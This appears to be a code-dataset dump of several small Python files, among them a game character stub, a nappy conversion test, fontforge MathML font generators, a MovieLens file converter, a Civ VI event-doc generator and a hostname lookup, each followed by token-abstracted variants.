36991c3191ba48b1b9dbd843e279f8fe124f1339
__author__ = 'Jager' from char import Character class Rouge (Character): def special_attack1(self, opponent, hitdamage_callback, specatt_callback): pass # hook method def special_attack2(self, opponent, hitdamage_callback, specatt_callback): pass # hook method def heal(self, target): pass # hook method def regen_resource(self): pass # hook method def full_resource(self): pass
[ "__author__ = 'Jager'\nfrom char import Character\n\nclass Rouge (Character):\n\n def special_attack1(self, opponent, hitdamage_callback, specatt_callback):\n pass # hook method\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass # hook method\n\n def heal(self, target):\n pass # hook method\n\n def regen_resource(self):\n pass # hook method\n\n\n def full_resource(self):\n pass", "__author__ = 'Jager'\nfrom char import Character\n\n\nclass Rouge(Character):\n\n def special_attack1(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def heal(self, target):\n pass\n\n def regen_resource(self):\n pass\n\n def full_resource(self):\n pass\n", "__author__ = 'Jager'\n<import token>\n\n\nclass Rouge(Character):\n\n def special_attack1(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def heal(self, target):\n pass\n\n def regen_resource(self):\n pass\n\n def full_resource(self):\n pass\n", "<assignment token>\n<import token>\n\n\nclass Rouge(Character):\n\n def special_attack1(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def heal(self, target):\n pass\n\n def regen_resource(self):\n pass\n\n def full_resource(self):\n pass\n", "<assignment token>\n<import token>\n\n\nclass Rouge(Character):\n <function token>\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def heal(self, target):\n pass\n\n def regen_resource(self):\n pass\n\n def full_resource(self):\n pass\n", "<assignment token>\n<import token>\n\n\nclass Rouge(Character):\n <function token>\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def heal(self, target):\n pass\n <function token>\n\n def full_resource(self):\n pass\n", "<assignment token>\n<import token>\n\n\nclass Rouge(Character):\n <function token>\n <function token>\n\n def heal(self, target):\n pass\n <function token>\n\n def full_resource(self):\n pass\n", "<assignment token>\n<import token>\n\n\nclass Rouge(Character):\n <function token>\n <function token>\n\n def heal(self, target):\n pass\n <function token>\n <function token>\n", "<assignment token>\n<import token>\n\n\nclass Rouge(Character):\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n", "<assignment token>\n<import token>\n<class token>\n" ]
false
74
0de657ee173b606ad61d614a6168c00fcd571a70
import os from .common import cached_outputs, data_files, test_outputs import nappy.nc_interface.na_to_nc import nappy.nc_interface.nc_to_na def test_convert_nc_2010_to_na_2310(): ffi_in, ffi_out = (2010, 2310) infile = os.path.join(cached_outputs, f"{ffi_in}.nc") outfile = os.path.join(test_outputs, f"{ffi_out}_from_nc_{ffi_in}.na") # Reading: infile x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out) # Writing: outfile x.writeNAFiles(outfile, delimiter=",", float_format="%g")
[ "import os\n\nfrom .common import cached_outputs, data_files, test_outputs\n\nimport nappy.nc_interface.na_to_nc\nimport nappy.nc_interface.nc_to_na\n\n\ndef test_convert_nc_2010_to_na_2310():\n ffi_in, ffi_out = (2010, 2310)\n\n infile = os.path.join(cached_outputs, f\"{ffi_in}.nc\")\n outfile = os.path.join(test_outputs, f\"{ffi_out}_from_nc_{ffi_in}.na\")\n\n # Reading: infile\n x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)\n\n # Writing: outfile\n x.writeNAFiles(outfile, delimiter=\",\", float_format=\"%g\")\n\n\n", "import os\nfrom .common import cached_outputs, data_files, test_outputs\nimport nappy.nc_interface.na_to_nc\nimport nappy.nc_interface.nc_to_na\n\n\ndef test_convert_nc_2010_to_na_2310():\n ffi_in, ffi_out = 2010, 2310\n infile = os.path.join(cached_outputs, f'{ffi_in}.nc')\n outfile = os.path.join(test_outputs, f'{ffi_out}_from_nc_{ffi_in}.na')\n x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)\n x.writeNAFiles(outfile, delimiter=',', float_format='%g')\n", "<import token>\n\n\ndef test_convert_nc_2010_to_na_2310():\n ffi_in, ffi_out = 2010, 2310\n infile = os.path.join(cached_outputs, f'{ffi_in}.nc')\n outfile = os.path.join(test_outputs, f'{ffi_out}_from_nc_{ffi_in}.na')\n x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)\n x.writeNAFiles(outfile, delimiter=',', float_format='%g')\n", "<import token>\n<function token>\n" ]
false
75
06638b361c1cbe92660d242969590dfa45b63a4d
#!/usr/bin/env python3 from utils import mathfont import fontforge v1 = 5 * mathfont.em v2 = 1 * mathfont.em f = mathfont.create("stack-bottomdisplaystyleshiftdown%d-axisheight%d" % (v1, v2), "Copyright (c) 2016 MathML Association") f.math.AxisHeight = v2 f.math.StackBottomDisplayStyleShiftDown = v1 f.math.StackBottomShiftDown = 0 f.math.StackDisplayStyleGapMin = 0 f.math.StackGapMin = 0 f.math.StackTopDisplayStyleShiftUp = 0 f.math.StackTopShiftUp = 0 mathfont.save(f) v1 = 6 * mathfont.em v2 = 1 * mathfont.em f = mathfont.create("stack-bottomshiftdown%d-axisheight%d" % (v1, v2), "Copyright (c) 2016 MathML Association") f.math.AxisHeight = v2 f.math.StackBottomDisplayStyleShiftDown = 0 f.math.StackBottomShiftDown = v1 f.math.StackDisplayStyleGapMin = 0 f.math.StackGapMin = 0 f.math.StackTopDisplayStyleShiftUp = 0 f.math.StackTopShiftUp = 0 mathfont.save(f) v = 4 * mathfont.em f = mathfont.create("stack-displaystylegapmin%d" % v, "Copyright (c) 2016 MathML Association") f.math.AxisHeight = 0 f.math.StackBottomDisplayStyleShiftDown = 0 f.math.StackBottomShiftDown = 0 f.math.StackDisplayStyleGapMin = v f.math.StackGapMin = 0 f.math.StackTopDisplayStyleShiftUp = 0 f.math.StackTopShiftUp = 0 mathfont.save(f) v = 8 * mathfont.em f = mathfont.create("stack-gapmin%d" % v, "Copyright (c) 2016 MathML Association") f.math.AxisHeight = 0 f.math.StackBottomDisplayStyleShiftDown = 0 f.math.StackBottomShiftDown = 0 f.math.StackDisplayStyleGapMin = 0 f.math.StackGapMin = v f.math.StackTopDisplayStyleShiftUp = 0 f.math.StackTopShiftUp = 0 mathfont.save(f) v1 = 3 * mathfont.em v2 = 1 * mathfont.em f = mathfont.create("stack-topdisplaystyleshiftup%d-axisheight%d" % (v1, v2), "Copyright (c) 2016 MathML Association") f.math.AxisHeight = v2 f.math.StackBottomDisplayStyleShiftDown = 0 f.math.StackBottomShiftDown = 0 f.math.StackDisplayStyleGapMin = 0 f.math.StackGapMin = 0 f.math.StackTopDisplayStyleShiftUp = v1 f.math.StackTopShiftUp = 0 mathfont.save(f) v1 = 9 * mathfont.em v2 = 1 * mathfont.em f = mathfont.create("stack-topshiftup%d-axisheight%d" % (v1, v2), "Copyright (c) 2016 MathML Association") f.math.AxisHeight = v2 f.math.StackBottomDisplayStyleShiftDown = 0 f.math.StackBottomShiftDown = 0 f.math.StackDisplayStyleGapMin = 0 f.math.StackGapMin = 0 f.math.StackTopDisplayStyleShiftUp = 0 f.math.StackTopShiftUp = v1 mathfont.save(f)
[ "#!/usr/bin/env python3\n\nfrom utils import mathfont\nimport fontforge\n\nv1 = 5 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create(\"stack-bottomdisplaystyleshiftdown%d-axisheight%d\" % (v1, v2),\n \"Copyright (c) 2016 MathML Association\")\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = v1\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\n\nv1 = 6 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create(\"stack-bottomshiftdown%d-axisheight%d\" % (v1, v2),\n \"Copyright (c) 2016 MathML Association\")\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = v1\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\n\nv = 4 * mathfont.em\nf = mathfont.create(\"stack-displaystylegapmin%d\" % v,\n \"Copyright (c) 2016 MathML Association\")\nf.math.AxisHeight = 0\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = v\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\n\nv = 8 * mathfont.em\nf = mathfont.create(\"stack-gapmin%d\" % v,\n \"Copyright (c) 2016 MathML Association\")\nf.math.AxisHeight = 0\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = v\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\n\nv1 = 3 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create(\"stack-topdisplaystyleshiftup%d-axisheight%d\" % (v1, v2),\n \"Copyright (c) 2016 MathML Association\")\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = v1\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\n\nv1 = 9 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create(\"stack-topshiftup%d-axisheight%d\" % (v1, v2),\n \"Copyright (c) 2016 MathML Association\")\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = v1\nmathfont.save(f)\n", "from utils import mathfont\nimport fontforge\nv1 = 5 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create('stack-bottomdisplaystyleshiftdown%d-axisheight%d' % (\n v1, v2), 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = v1\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\nv1 = 6 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create('stack-bottomshiftdown%d-axisheight%d' % (v1, v2),\n 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = v1\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\nv = 4 * mathfont.em\nf = mathfont.create('stack-displaystylegapmin%d' % v,\n 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = 0\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = v\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\nv = 8 * mathfont.em\nf = mathfont.create('stack-gapmin%d' % v,\n 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = 0\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = v\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\nv1 = 3 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create('stack-topdisplaystyleshiftup%d-axisheight%d' % (v1, v2\n ), 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = v1\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\nv1 = 9 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create('stack-topshiftup%d-axisheight%d' % (v1, v2),\n 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = v1\nmathfont.save(f)\n", "<import token>\nv1 = 5 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create('stack-bottomdisplaystyleshiftdown%d-axisheight%d' % (\n v1, v2), 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = v1\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\nv1 = 6 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create('stack-bottomshiftdown%d-axisheight%d' % (v1, v2),\n 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = v1\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\nv = 4 * mathfont.em\nf = mathfont.create('stack-displaystylegapmin%d' % v,\n 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = 0\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = v\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\nv = 8 * mathfont.em\nf = mathfont.create('stack-gapmin%d' % v,\n 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = 0\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = v\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\nv1 = 3 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create('stack-topdisplaystyleshiftup%d-axisheight%d' % (v1, v2\n ), 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = v1\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\nv1 = 9 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create('stack-topshiftup%d-axisheight%d' % (v1, v2),\n 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = v1\nmathfont.save(f)\n", "<import token>\n<assignment token>\nmathfont.save(f)\n<assignment token>\nmathfont.save(f)\n<assignment token>\nmathfont.save(f)\n<assignment token>\nmathfont.save(f)\n<assignment token>\nmathfont.save(f)\n<assignment token>\nmathfont.save(f)\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
76
2dd59681a0dcb5d3f1143385100c09c7783babf4
#!/usr/bin/env python # script :: creating a datamodel that fits mahout from ratings.dat ratings_dat = open('../data/movielens-1m/users.dat', 'r') ratings_csv = open('../data/movielens-1m/users.txt', 'w') for line in ratings_dat: arr = line.split('::') new_line = '\t'.join(arr) ratings_csv.write(new_line) ratings_dat.close() ratings_csv.close()
[ "#!/usr/bin/env python\n# script :: creating a datamodel that fits mahout from ratings.dat\n\n\n\nratings_dat = open('../data/movielens-1m/users.dat', 'r')\nratings_csv = open('../data/movielens-1m/users.txt', 'w')\n\nfor line in ratings_dat:\n\tarr = line.split('::')\n\tnew_line = '\\t'.join(arr)\n\n\tratings_csv.write(new_line)\n\nratings_dat.close()\nratings_csv.close()\n", "ratings_dat = open('../data/movielens-1m/users.dat', 'r')\nratings_csv = open('../data/movielens-1m/users.txt', 'w')\nfor line in ratings_dat:\n arr = line.split('::')\n new_line = '\\t'.join(arr)\n ratings_csv.write(new_line)\nratings_dat.close()\nratings_csv.close()\n", "<assignment token>\nfor line in ratings_dat:\n arr = line.split('::')\n new_line = '\\t'.join(arr)\n ratings_csv.write(new_line)\nratings_dat.close()\nratings_csv.close()\n", "<assignment token>\n<code token>\n" ]
false
77
5ce98ae241c0982eeb1027ffcff5b770f94ff1a3
import csv import os events = {} eventTypes = set() eventIndices = {} i = 0 with open('Civ VI Modding Companion - Events.csv', newline='') as csvfile: reader = csv.reader(csvfile, delimiter=',', quotechar='|') for row in reader: if i < 4: i += 1 continue eventName = row[3] eventType = "GameEvents" if len(row[10]) > 0 else "Events" argumentName = row[4] argumentType = row[5][1:] try: events[eventName] except Exception: events[eventName] = {'eventType': eventType, 'arguments': []} eventTypes.add(eventType) if argumentName: argumentText = '`' + argumentName if argumentType: argumentText += ' [' + argumentType + ']' argumentText += '`' # argument = {'argumentName': argumentName, 'argumentType': argumentType, 'argumentText': argumentText} events[eventName]['arguments'].append(argumentText) for eventType in eventTypes: filename = '../EventObjects/' + eventType + '.md' os.makedirs(os.path.dirname(filename), exist_ok=True) f = open(filename, "w") eventIndices[eventType] = f f.write('## Static Events\n') f.write('Events can be subscribed by using `' + eventType + '.SomeEvent.Add(SomeFunction)`.\n') f.write('\n') f.write('| Name | Parameters |\n') f.write('|:---- |:--------- |\n') for eventName in events: event = events[eventName] eventType = event['eventType'] eventIndex = eventIndices[eventType] arguments = event['arguments'] # ----------------------- # Create Index Entry # ----------------------- indexEntry = '| [[' + eventType + "." + eventName + ']] | ' if len(arguments) > 0: indexEntry += "<br/>".join(arguments) indexEntry += ' |\n' eventIndex.write(indexEntry) # ----------------------- # Create Event File # ----------------------- fullName = eventType + '.' + eventName filename = '../EventObjects/' + eventType + '/' + eventType + "." + eventName + '.md' os.makedirs(os.path.dirname(filename), exist_ok=True) f = open(filename, "w") f.write('# ' + fullName + "\n") f.write('## Description\n') f.write('TBD\n') f.write('\n') f.write('## Usage\n') argumentsText = (", ".join(arguments)) argumentsText = argumentsText.replace('`', '') f.write('> `' + fullName + '(' + argumentsText + ')`\n\n') f.write('Regular event: you can subscribe to it through `' + fullName + '.Add(<function handler>)`\n') f.write('\n') f.write('### Parameters\n') argumentsList = "\n- ".join(arguments) if len(argumentsList) > 0: argumentsList = '- ' + argumentsList f.write(argumentsList)
[ "import csv\nimport os\n\nevents = {}\neventTypes = set()\neventIndices = {}\n\ni = 0\n\nwith open('Civ VI Modding Companion - Events.csv', newline='') as csvfile:\n\treader = csv.reader(csvfile, delimiter=',', quotechar='|')\n\tfor row in reader:\n\n\t\tif i < 4:\n\t\t\ti += 1\n\t\t\tcontinue\n\n\t\teventName = row[3]\n\t\teventType = \"GameEvents\" if len(row[10]) > 0 else \"Events\"\n\n\t\targumentName = row[4]\n\t\targumentType = row[5][1:]\n\n\t\ttry:\n\t\t\tevents[eventName]\n\t\texcept Exception:\n\t\t\tevents[eventName] = {'eventType': eventType, 'arguments': []}\n\n\t\teventTypes.add(eventType)\n\n\t\tif argumentName:\n\t\t\targumentText = '`' + argumentName\n\t\t\tif argumentType:\n\t\t\t\targumentText += ' [' + argumentType + ']'\n\t\t\targumentText += '`'\n\n\t\t\t# argument = {'argumentName': argumentName, 'argumentType': argumentType, 'argumentText': argumentText}\n\t\t\tevents[eventName]['arguments'].append(argumentText)\n\nfor eventType in eventTypes:\n\n\tfilename = '../EventObjects/' + eventType + '.md'\n\n\tos.makedirs(os.path.dirname(filename), exist_ok=True)\n\tf = open(filename, \"w\")\n\teventIndices[eventType] = f\n\n\tf.write('## Static Events\\n')\n\tf.write('Events can be subscribed by using `' + eventType + '.SomeEvent.Add(SomeFunction)`.\\n')\n\tf.write('\\n')\n\tf.write('| Name | Parameters |\\n')\n\tf.write('|:---- |:--------- |\\n')\n\nfor eventName in events:\n\n\tevent\t\t= events[eventName]\n\teventType\t= event['eventType']\n\teventIndex\t= eventIndices[eventType]\n\n\targuments\t= event['arguments']\n\n\t# -----------------------\n\t# Create Index Entry\n\t# -----------------------\n\tindexEntry = '| [[' + eventType + \".\" + eventName + ']] | '\n\n\tif len(arguments) > 0:\n\t\tindexEntry += \"<br/>\".join(arguments)\n\n\tindexEntry += ' |\\n'\n\teventIndex.write(indexEntry)\n\t# -----------------------\n\t# Create Event File\n\t# -----------------------\n\tfullName = eventType + '.' + eventName\n\n\tfilename = '../EventObjects/' + eventType + '/' + eventType + \".\" + eventName + '.md'\n\tos.makedirs(os.path.dirname(filename), exist_ok=True)\n\tf = open(filename, \"w\")\n\n\tf.write('# ' + fullName + \"\\n\")\n\tf.write('## Description\\n')\n\tf.write('TBD\\n')\n\tf.write('\\n')\n\tf.write('## Usage\\n')\n\n\targumentsText = (\", \".join(arguments))\n\targumentsText = argumentsText.replace('`', '')\n\n\tf.write('> `' + fullName + '(' + argumentsText + ')`\\n\\n')\n\tf.write('Regular event: you can subscribe to it through `' + fullName + '.Add(<function handler>)`\\n')\n\tf.write('\\n')\n\tf.write('### Parameters\\n')\n\n\targumentsList = \"\\n- \".join(arguments)\n\tif len(argumentsList) > 0:\n\t\targumentsList = '- ' + argumentsList\n\n\tf.write(argumentsList)\n", "import csv\nimport os\nevents = {}\neventTypes = set()\neventIndices = {}\ni = 0\nwith open('Civ VI Modding Companion - Events.csv', newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='|')\n for row in reader:\n if i < 4:\n i += 1\n continue\n eventName = row[3]\n eventType = 'GameEvents' if len(row[10]) > 0 else 'Events'\n argumentName = row[4]\n argumentType = row[5][1:]\n try:\n events[eventName]\n except Exception:\n events[eventName] = {'eventType': eventType, 'arguments': []}\n eventTypes.add(eventType)\n if argumentName:\n argumentText = '`' + argumentName\n if argumentType:\n argumentText += ' [' + argumentType + ']'\n argumentText += '`'\n events[eventName]['arguments'].append(argumentText)\nfor eventType in eventTypes:\n filename = '../EventObjects/' + eventType + '.md'\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n f = open(filename, 'w')\n eventIndices[eventType] = f\n f.write('## Static Events\\n')\n f.write('Events can be subscribed by using `' + eventType +\n '.SomeEvent.Add(SomeFunction)`.\\n')\n f.write('\\n')\n f.write('| Name | Parameters |\\n')\n f.write('|:---- |:--------- |\\n')\nfor eventName in events:\n event = events[eventName]\n eventType = event['eventType']\n eventIndex = eventIndices[eventType]\n arguments = event['arguments']\n indexEntry = '| [[' + eventType + '.' + eventName + ']] | '\n if len(arguments) > 0:\n indexEntry += '<br/>'.join(arguments)\n indexEntry += ' |\\n'\n eventIndex.write(indexEntry)\n fullName = eventType + '.' + eventName\n filename = ('../EventObjects/' + eventType + '/' + eventType + '.' +\n eventName + '.md')\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n f = open(filename, 'w')\n f.write('# ' + fullName + '\\n')\n f.write('## Description\\n')\n f.write('TBD\\n')\n f.write('\\n')\n f.write('## Usage\\n')\n argumentsText = ', '.join(arguments)\n argumentsText = argumentsText.replace('`', '')\n f.write('> `' + fullName + '(' + argumentsText + ')`\\n\\n')\n f.write('Regular event: you can subscribe to it through `' + fullName +\n \"\"\".Add(<function handler>)`\n\"\"\")\n f.write('\\n')\n f.write('### Parameters\\n')\n argumentsList = '\\n- '.join(arguments)\n if len(argumentsList) > 0:\n argumentsList = '- ' + argumentsList\n f.write(argumentsList)\n", "<import token>\nevents = {}\neventTypes = set()\neventIndices = {}\ni = 0\nwith open('Civ VI Modding Companion - Events.csv', newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='|')\n for row in reader:\n if i < 4:\n i += 1\n continue\n eventName = row[3]\n eventType = 'GameEvents' if len(row[10]) > 0 else 'Events'\n argumentName = row[4]\n argumentType = row[5][1:]\n try:\n events[eventName]\n except Exception:\n events[eventName] = {'eventType': eventType, 'arguments': []}\n eventTypes.add(eventType)\n if argumentName:\n argumentText = '`' + argumentName\n if argumentType:\n argumentText += ' [' + argumentType + ']'\n argumentText += '`'\n events[eventName]['arguments'].append(argumentText)\nfor eventType in eventTypes:\n filename = '../EventObjects/' + eventType + '.md'\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n f = open(filename, 'w')\n eventIndices[eventType] = f\n f.write('## Static Events\\n')\n f.write('Events can be subscribed by using `' + eventType +\n '.SomeEvent.Add(SomeFunction)`.\\n')\n f.write('\\n')\n f.write('| Name | Parameters |\\n')\n f.write('|:---- |:--------- |\\n')\nfor eventName in events:\n event = events[eventName]\n eventType = event['eventType']\n eventIndex = eventIndices[eventType]\n arguments = event['arguments']\n indexEntry = '| [[' + eventType + '.' + eventName + ']] | '\n if len(arguments) > 0:\n indexEntry += '<br/>'.join(arguments)\n indexEntry += ' |\\n'\n eventIndex.write(indexEntry)\n fullName = eventType + '.' + eventName\n filename = ('../EventObjects/' + eventType + '/' + eventType + '.' +\n eventName + '.md')\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n f = open(filename, 'w')\n f.write('# ' + fullName + '\\n')\n f.write('## Description\\n')\n f.write('TBD\\n')\n f.write('\\n')\n f.write('## Usage\\n')\n argumentsText = ', '.join(arguments)\n argumentsText = argumentsText.replace('`', '')\n f.write('> `' + fullName + '(' + argumentsText + ')`\\n\\n')\n f.write('Regular event: you can subscribe to it through `' + fullName +\n \"\"\".Add(<function handler>)`\n\"\"\")\n f.write('\\n')\n f.write('### Parameters\\n')\n argumentsList = '\\n- '.join(arguments)\n if len(argumentsList) > 0:\n argumentsList = '- ' + argumentsList\n f.write(argumentsList)\n", "<import token>\n<assignment token>\nwith open('Civ VI Modding Companion - Events.csv', newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='|')\n for row in reader:\n if i < 4:\n i += 1\n continue\n eventName = row[3]\n eventType = 'GameEvents' if len(row[10]) > 0 else 'Events'\n argumentName = row[4]\n argumentType = row[5][1:]\n try:\n events[eventName]\n except Exception:\n events[eventName] = {'eventType': eventType, 'arguments': []}\n eventTypes.add(eventType)\n if argumentName:\n argumentText = '`' + argumentName\n if argumentType:\n argumentText += ' [' + argumentType + ']'\n argumentText += '`'\n events[eventName]['arguments'].append(argumentText)\nfor eventType in eventTypes:\n filename = '../EventObjects/' + eventType + '.md'\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n f = open(filename, 'w')\n eventIndices[eventType] = f\n f.write('## Static Events\\n')\n f.write('Events can be subscribed by using `' + eventType +\n '.SomeEvent.Add(SomeFunction)`.\\n')\n f.write('\\n')\n f.write('| Name | Parameters |\\n')\n f.write('|:---- |:--------- |\\n')\nfor eventName in events:\n event = events[eventName]\n eventType = event['eventType']\n eventIndex = eventIndices[eventType]\n arguments = event['arguments']\n indexEntry = '| [[' + eventType + '.' + eventName + ']] | '\n if len(arguments) > 0:\n indexEntry += '<br/>'.join(arguments)\n indexEntry += ' |\\n'\n eventIndex.write(indexEntry)\n fullName = eventType + '.' + eventName\n filename = ('../EventObjects/' + eventType + '/' + eventType + '.' +\n eventName + '.md')\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n f = open(filename, 'w')\n f.write('# ' + fullName + '\\n')\n f.write('## Description\\n')\n f.write('TBD\\n')\n f.write('\\n')\n f.write('## Usage\\n')\n argumentsText = ', '.join(arguments)\n argumentsText = argumentsText.replace('`', '')\n f.write('> `' + fullName + '(' + argumentsText + ')`\\n\\n')\n f.write('Regular event: you can subscribe to it through `' + fullName +\n \"\"\".Add(<function handler>)`\n\"\"\")\n f.write('\\n')\n f.write('### Parameters\\n')\n argumentsList = '\\n- '.join(arguments)\n if len(argumentsList) > 0:\n argumentsList = '- ' + argumentsList\n f.write(argumentsList)\n", "<import token>\n<assignment token>\n<code token>\n" ]
false
78
79c043fc862e77bea5adc3f1c6bb9a6272f19c75
#!/usr/bin/env python import socket name = socket.gethostname()
[ "#!/usr/bin/env python\n\nimport socket\n\nname = socket.gethostname()\n", "import socket\nname = socket.gethostname()\n", "<import token>\nname = socket.gethostname()\n", "<import token>\n<assignment token>\n" ]
false
79
22c498d84f40455d89ed32ccf3bf8778cb159579
